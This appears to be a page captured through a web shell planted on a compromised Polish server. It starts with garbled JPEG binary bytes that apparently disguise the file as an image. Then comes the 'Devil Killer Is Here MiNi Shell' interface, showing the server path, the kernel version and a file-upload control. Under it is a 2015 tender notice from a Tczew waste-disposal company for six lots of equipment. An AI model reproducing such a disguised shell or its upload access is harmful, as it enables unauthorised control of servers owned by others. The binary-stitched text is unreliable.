JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150227/26639-N-2015.html

<p class="kh_header"><b>Tczew: Kontrakt X - Dostawa dodatkowego wyposażenia Regionalnego Zakładu Unieszkodliwiania Odpadów w Tczewie - etap 2</b><br>
<b>Numer ogłoszenia: 26639 - 2015; data zamieszczenia: 27.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Utylizacji Odpadów Stałych sp. z o. o. , ul. Rokicka 5A, 83-110 Tczew, woj. pomorskie, tel. 058 5328372, faks 058 5328372.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zuostczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontrakt X - Dostawa dodatkowego wyposażenia Regionalnego Zakładu Unieszkodliwiania Odpadów w Tczewie - etap 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa, polegająca na sprzedaży dodatkowego wyposażenia dla potrzeb Regionalnego Zakładu Unieszkodliwiania Odpadów w Tczewie (zgodnie z opisem i wymaganiami wskazanymi w pkt 3.2 SIWZ). Zamówienie to realizowane jest w ramach rozszerzenia Projektu Regionalny System Gospodarki Odpadami Tczew.

Szczegółowy opis przedmiotu zamówienia 

1)	Część 1 - Dostawa bębna przesiewającego do sita mobilnego
Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego bębna przesiewającego - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Bęben przesiewający do sita mobilnego wykorzystywany do przesiewania materiału kompostowego po procesie stabilizacji tlenowej 
- Bęben musi być kompatybilny w maszyną Zamawiającego: Doppstadt seria SM 518
- Wielkość oczka 8x8 mm, grubość 6 mm
- Certyfikat CE i instrukcja obsługi w języku polskim,
Przedmiot zamówienia obejmuje dostawę sita wraz z narzędziami niezbędnymi do przeprowadzenia montażu, oraz szkolenie personelu Zamawiającego w zakresie wymiany bębna. 
	 
2)	Część 2 - Dostawa młota udarowego do koparko - ładowarki
Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego młota udarowego - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 
- Energia uderzenia: 981 J
- Max częstotliwość: 900 c/min
- Max przepływ oleju: 40-80 l/min
- Max masa robocza: 330 kg
- Urządzenie kompatybilne z maszyną Zamawiającego koparko-ładowarka JCB 3CX ECO 
- Certyfikat CE , pełna dokumentacja DTR i instrukcja obsługi w języku polskim,
Przedmiot zamówienia obejmuje dostawę, montaż w koparko-ładowarce dodatkowej instalacji hydraulicznej do obsługi młota oraz szkolenie personelu z obsługi.

3)	Część 3 - Dostawa mobilnego podnośnika kolumnowego
Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego mobilnego podnośnika kolumnowego w ilości 4 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Udźwig łączny min. 28000 kg
- Wysokość podnoszenia: min 1800 mm,
- Długość wideł: min. 300 mm,
- Napęd: elektro - hydrauliczny,
- Zasilanie: max 400V/16A
- Średnica koła: min 16 cali - max. 22,5 cala/ regulowany rozstaw wideł,
- Mechanizm podnoszenia: wisząco ułożyskowana śruba napędowa z trapezowym gwintem i z samohamującą nakrętką z brązu,
- Układ hydrauliczny - samo-smarowny,
- Mobilne kolumny podnośnika w obudowie umożliwiającej przemieszczanie przez 1 pracownika,
- Możliwość używania w pomieszczeniach jak i na zewnątrz (odporne na warunki atmosferyczne),
- Możliwość awaryjnego opuszczenia pojazdu w przypadku braku zasilania oraz  min. 2 zabezpieczenia przed samoistnym opuszczeniem pojazdu
- Podwójne zabezpieczenie przeciążeniowe silników,
- Zsynchronizowany (elektroniczny) ruch kolumn,
- kolumna sterująca z głównym panelem kontrolnym z opcjami sterowania: jednoczesna praca wszystkich kolumn  oraz jednoczesna praca 1 lub więcej par kolumn,
- Badanie i dopuszczenie urządzenia w UDT (o ile dotyczy), 
- Certyfikat CE , pełna dokumentacja DTR i instrukcja obsługi w języku polskim,
Przedmiot zamówienia obejmuje dostawę, montaż, oraz szkolenie personelu Zamawiającego z obsługi.

4)	Część 4 - Dostawa kosiarki wysięgnikowej do ciągnika
Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowej kosiarki wysięgnikowej - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 
- Zasięg pracy (poziomy) wysięgnika z głowicą koszącą wynoszący min. 6-6,5 m od osi ciągnika, wraz z wysuwem dodatkowego ramienia min. 0,8 m,
- Wysięgnik sterowany z kabiny operatora mechanicznie lub elektrycznie, 
- Możliwość pracy ramienia w poziomie - min. 95°
- Dwa kierunki obrotu wału głowicy sterowane z kabiny operatora,
- Pompa hydrauliczna główna o pojemności min: 73 cm3
- Moc układu hydraulicznego ramienia: min 65 KM,
- Połączenia hydrauliczne: sucho odcinające,
- Wysokość i szerokość transportowa oraz waga zestawu: dostosowana do ciągnika Zamawiającego Crystal Orion 13.4,
- Głowica zamocowana wahliwie na ramieniu
- Napęd: hydrauliczny
- Zbiornik oleju hydraulicznego: min. 200 l z chłodnicą oraz elektronicznym regulatorem temperatury - niezależnie od układu hydraulicznego ciągnika
- Zabezpieczenie obrotu ramienia - amortyzator gazowo - hydrauliczny,
- Zabezpieczenie płynnej pracy ramienia - amortyzator gazowo - hydrauliczny,
- Konstrukcja ramienia kosiarki: sztywna, połączona nierozerwalnie ze zbiornikiem, ramię wykonane w całości z profilu zamkniętego o min. przekroju 120x120 mm
- Szerokość robocza głowicy min. 1100 mm
- Głowica wyposażona w noże młotkowe/noże tnące, przystosowana do montażu na ramieniu objętym specyfikacją,
- Moc na wale tnącym: min. 50 KM,
- Obroty wału tnącego: min. 3000 obr./min
- Regulacja wysokości cięcia w dwóch położeniach,
- Możliwość zwiększenia zasięgu roboczego ramienia,
- Ciężar zestawu (głowica + ramię) max. 1500 kg,
- Certyfikat CE , pełna dokumentacja DTR i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje dostawę, montaż kosiarki na ciągniku Zamawiającego oraz szkolenie personelu z obsługi.

5)	Część 5 - Dostawa wag do ładowarek kołowych
Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowych wag do ładowarek kołowych w ilości 2 szt. o poniższych minimalnych parametrach i wyposażeniu: 
- Zakres ważenia: od 200 kg,
- Działka legalizacyjna: max. 20 kg przy nośności max. 5000 kg,
- Zasilanie: 24 V
- Zakres temperatur pracy: -25° do +40°
- Wyświetlacz LCD, dotykowy o przekątnej max. 6 cali ,
- Waga oparta na czujnikach ciśnienia,
- Moduł z czujnikiem położenia ramienia ładowarki,
- Moduł z  czujnikiem położenia łyżki,
- Moduł pomiarowy z wbudowanym czujnikiem przechyłu,
- Okablowanie specjalistyczne z montażem okablowania w osłonach ochronnych o szczelności w klasie IP64,
- Drukarka paragonowa z zapasem rolek - 30 szt.,
- Dodatkowa klawiatura USB,
- Kamera cofania,
- Port USB do przenoszenia danych z ważenia,
- Możliwość wprowadzenia do pamięci urządzenia między innymi: nazwy przedsiębiorstwa, rodzaju materiału, datę, godzinę, masę towaru załadowanego, ilość łyżek, nazwisko operatora, odbiorcę, wydruk raportu dziennego,
- Pamięć na min 10000 kompletnych ważeń,
- 4 pozycje pamięci do dowolnej konfiguracji,
- Przez czas trwania gwarancji dostawa bezpłatnej subskrypcji oprogramowania wagowego,
- Certyfikat CE i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje dostawę, montaż, kalibrację oraz szkolenie personelu Zamawiającego z obsługi wag.

6)	Część 5 - Dostawa mobilnego podestu o napędzie elektrycznym  szt. 1
Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego mobilnego podestu - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Wysokość robocza - min. 11,5 m,
- Wysokość platformy - min. 10 m,
- Platforma rozsuwana - min. 0,90 m,
- Zasilanie - elektryczne,
- Udźwig - min. 310 kg,
- Wysokość transportowa - min. 1,99 m,
- Szerokość - min. 0,9 m, max. 1,1 m,
- Długość - min. 2,45 m,
- Zewnętrzny promień skrętu - 2,20 m,
- Masa własna - max. 2900 kg,
- Zdolność pokonywania wzniesień - min. 25%,
- Pełny skręt kół - 90 stopni,
- Sygnalizacja przechyłu bocznego,
- Baterie 24V/24 Ah z możliwością łatwego dostępu dla obsługi,
- Wbudowany prostownik,
- Lampa błyskowa (kogut),
- Joystick sterowniczy zabezpieczony przed uszkodzeniem,
- Możliwość jazdy z max podniesioną platformą,
- Badanie i dopuszczenie urządzenia w UDT,
- Certyfikat CE,
- Pełna dokumentacja DTR i instrukcja obsługi w języku polskim,

Przedmiot zamówienia obejmuje uruchomienie podestu w miejscu dostawy oraz szkolenie personelu Zamawiającego z obsługi podestu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.00.00-1, 44.61.62.00-3, 44.51.26.00-8, 34.32.62.00-0, 42.41.70.00-2, 16.31.00.00-1, 42.92.30.00-2, 42.92.31.10-0, 51.54.00.00-0, 80.51.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Formularz Oferty sporządzony na podstawie wzoru stanowiącego załącznik nr 1A dla Części 1,  załącznik nr 1B dla Części 2, załącznik nr 1C dla Części 3,  załącznik nr 1D dla Części 4, załącznik nr 1E dla Części 5 załącznik nr 1F dla Części 6 do niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - termin dostawy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zgodnie z art. 144 u.p.z.p. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do
treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia następujących warunków:
1)	zmiany terminu wykonania dostaw oraz pozostałych zobowiązań Wykonawcy, w następstwie siły wyższej, tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia (niemożliwość zapobieżenia nie tyle samemu zjawisku, co jego następstwom, na które Strona nie ma wpływu i której nie można przypisać drugiej Stronie), w tym m.in. katastrofa naturalna, katastrofalne działanie ustanowienie stanu klęski żywiołowej, epidemia, ograniczenia z powodu kwarantanny lub embarga, strajk, zamieszki uliczne, pożar,  eksplozja, wojna lub rewolucja, atak terrorystyczny. Jeżeli siła wyższa uniemożliwia lub przewiduje się, że uniemożliwi którejkolwiek ze Stron wykonanie dostaw bądź pozostałych zobowiązań wynikających z umowy, to Strona ta powiadomi drugą Stronę o zaistniałym wydarzeniu lub okolicznościach i wyszczególni zobowiązania, 	których wykonanie będzie uniemożliwione w ich wyniku. Powiadomienie to zostanie przekazane w terminie 14 dni od momentu powzięcia wiedzy o wydarzeniach bądź okolicznościach;
2)	zmiany terminu wykonania z powodu zmiany prawa Rzeczypospolitej Polskiej wprowadzonego przez władzę ustawodawczą lub wykonawczą;
3)	zmiany terminu wykonania w przypadku wystąpienia awarii środowiskowej na obiektach Zamawiającego;
4)	zmiany terminu wykonania w przypadku wystąpienia działań osób trzecich uniemożliwiających wykonanie prac/dostaw, które to działania nie są konsekwencją winy którejkolwiek ze stron niniejszej Umowy; w szczególności dotyczy wszelkich opóźnień w toku produkcji urządzeń nie zawinionych bezpośrednio przez Wykonawcę zamówienia publicznego;
5)	zmiany parametrów dostarczanego sprzętu w sytuacji zaistnienia możliwości wprowadzenia lepszych rozwiązań technicznych lub lepszych materiałów czy urządzeń (pod warunkiem zatwierdzenia tych zmian przez Zamawiającego) w stosunku do przyjętych w ofercie przetargowej, a  mających wpływ na obniżenie kosztu ponoszonego  przez  Zamawiającego  na  eksploatację, konserwację, serwis (materiały eksploatacyjne).
a.	Wprowadzenie zmian  technicznych / parametrów lub technologicznych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego;
6)	zmiany kolejności lub terminów dostaw etapowych/częściowych;
7)	zmiany podwykonawcy, pod warunkiem zgodności z postanowieniami SIWZ;
8)	zmiany danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego);
9)	zmiany danych adresowych;
10)	wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
11)	wystąpienia konieczności zmiany osób (śmierć, choroba, rezygnacja lub inne zdarzenie losowe) reprezentujących w trakcie realizacji umowy interesy stron.
12)	zmiany stawki podatku od towarów i usług VAT;
13)	zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia,
14)	wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy,
15)	zmiany terminu wykonania w przypadku niezależnego od Wykonawcy przedłużania się okresu trwania dostawy trudnodostępnych, wymagających zamówienia elementów wyposażenia urządzeń niezbędnych do prawidłowej realizacji kompletnej dostawy;
16)	zmiana ceny Umowy  spowodowanej zaistnieniem jednej z sytuacji wymienionych w pkt 1) - 15).	
2. Zmiana osób występujących w imieniu Zamawiającego oraz osoby reprezentującej Wykonawcę i danych
adresowych nie wymaga sporządzenia pisemnego aneksu do umowy, a możliwa będzie jedynie w przypadku pisemnego
zawiadomienia Strony o propozycjach zmian i uzyskaniu pisemnej zgody na ich wprowadzenie. 3. Wykonawca jest zobowiązany do
pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na
adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną. 
4. Każda ze stron przedkładając drugiej stronie pisemną
propozycję zmian spełniająca wymogi określone w pkt. 1. powyżej wraz z tą propozycją przedłoży: a) opis proponowanych zmian i
harmonogram wykonania zmian, b) propozycję dotyczącą jakichkolwiek koniecznych modyfikacji w harmonogramie świadczenia
dostaw/usług i szacunek w jaki sposób zakładane zamiany wpłyną na termin realizacji przedmiotu umowy, oraz c) szacunki
dotyczące wpływu zmian na wynagrodzenie należne Wykonawcy wraz z uzasadnieniem. 
5. Po otrzymaniu propozycji, Wykonawca
albo Zamawiający (w zależności od przypadku) w terminie 7 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany lub w tym
terminie wystąpi do strony występującej z propozycją zmian, przesyłając zmodyfikowaną propozycję zmian spełniającą wymogi
opisane w pkt. 4. 
6. W przypadku upływu terminu podanego w pkt. 5. i nie uzyskania jednej z odpowiedzi opisanych w pkt. 5,
traktuje się, iż propozycja wprowadzenia zmian została odrzucona. 
7. Do przesłanych zmodyfikowanych propozycji zmian mają
zastosowanie postanowienia pkt. 5.-6.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zuostczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Utylizacji Odpadów Stałych Spółka z o.o. w Tczewie
ul. Rokicka 5A, 83-110 Tczew, Polska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2015 godzina 10:00, miejsce: Zakład Utylizacji Odpadów Stałych Spółka z o.o. w Tczewie
ul. Rokicka 5A, 83-110 Tczew, Polska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie dopuszcza możliwości zawarcia umowy ramowej. 2. Zgodnie z art. 23 ust.1 Prawa zamówień
publicznych wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając dokumenty zgodnie z zapisami zawartymi w
pkt 9 SIWZ. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo
reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku Wykonawcy
wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie pełnomocnictwa
ustanawiającego pełnomocnika, o którym mowa wyżej. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
3. Zamówienie niniejsze realizowane jest w ramach rozszerzenia Projektu Regionalny System
Gospodarki Odpadami Tczew który jest współfinansowany przez Unię Europejską ze środków Funduszu Spójności w ramach
Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 działanie 2.1 priorytetu II. Numer umowy o dofinansowanie:
POIS.02.01.00-00-006/08 -00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa bębna przesiewającego do sita mobilnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia niniejszej części obejmuje dostawę fabrycznie nowego bębna przesiewającego - 1 szt. o poniższych minimalnych parametrach i wyposażeniu: 

- Bęben przesiewający do sita mobilnego wykorzystywany do przesiewania materiału kompostowego po procesie stabilizacji tlenowej 
- Bęben musi być kompatybilny w maszyną Zamawiającego: Doppstadt seria SM 518
- Wielkość oczka 8x8 mm, grubość 6 mm
- Certyfikat CE i instrukcja obsługi w języku polskim,


Przedmiot zamówienia obejmuje dostawę sita wraz z narzędziami niezbędnymi do przeprowadzenia montażu, oraz szkolenie personelu Zamawiającego w zakresie wymiany bębna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.62.00-3.</p></li>
